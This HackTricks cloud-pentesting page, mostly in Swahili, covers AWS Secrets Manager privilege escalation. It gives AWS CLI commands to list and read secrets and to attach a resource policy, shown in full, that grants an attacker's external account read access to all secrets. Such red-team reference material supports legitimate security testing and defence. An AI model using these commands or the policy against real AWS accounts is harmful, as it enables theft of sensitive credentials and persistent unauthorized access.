AWS - Secrets Manager Privesc

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Secrets Manager

Kwa maelezo zaidi kuhusu secrets manager angalia:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Mshambuliaji mwenye ruhusa hii anaweza kupata thamani iliyohifadhiwa ndani ya siri katika AWS Secretsmanager.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Madhara Yanayoweza Kutokea: Upatikanaji wa data nyeti sana ndani ya huduma ya AWS secrets manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Kwa ruhusa zilizotajwa hapo awali, inawezekana kutoa upatikanaji kwa wahusika/akaunti wengine (hata za nje) kupata siri. Kumbuka kwamba ili kusoma siri zilizofichwa kwa kutumia funguo za KMS, mtumiaji pia anahitaji kuwa na upatikanaji juu ya funguo za KMS (maelezo zaidi kwenye KMS Enum page).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks